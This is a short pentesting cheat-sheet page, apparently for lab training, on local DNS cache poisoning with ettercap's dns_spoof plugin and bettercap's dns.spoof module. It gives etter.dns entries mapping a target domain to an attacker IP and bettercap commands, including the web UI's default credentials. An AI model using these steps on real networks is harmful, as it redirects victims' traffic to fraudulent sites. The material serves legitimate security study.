Local DNS Cache Poisoning
This attack involves altering legitimate DNS records with false information so that they can be used to redirect online traffic to a fraudulent website.
! It first requires ARP Poisoning on the victims.
GUI.
Edit the
/etc/ettercap/etter.dnsfile to map the target domain name you want to spoof and the IP address of the attacker you want to redirect a user to.Select targets (or even one) and add them to the scope.
Activate the
dns_spoofattack by navigating toPlugins>Manage Plugins.
# example step 1
inlanefreight.com A 192.168.225.110
*.inlanefreight.com A 192.168.225.110Command-line.
set dns.spoof.domains <DOMAIN>
# specific the domain you want to manipulateset dns.spoof.address <IP>
# Specify which address the manipulated domain will point todns.spoof on/offGUI.
sudo bettercap -eval "caplets.update; ui.update; q"sudo bettercap -caplet http-ui Default credential: user:pass
Change in /usr/share/bettercap/caplets/http-ui.cap
Last updated
Was this helpful?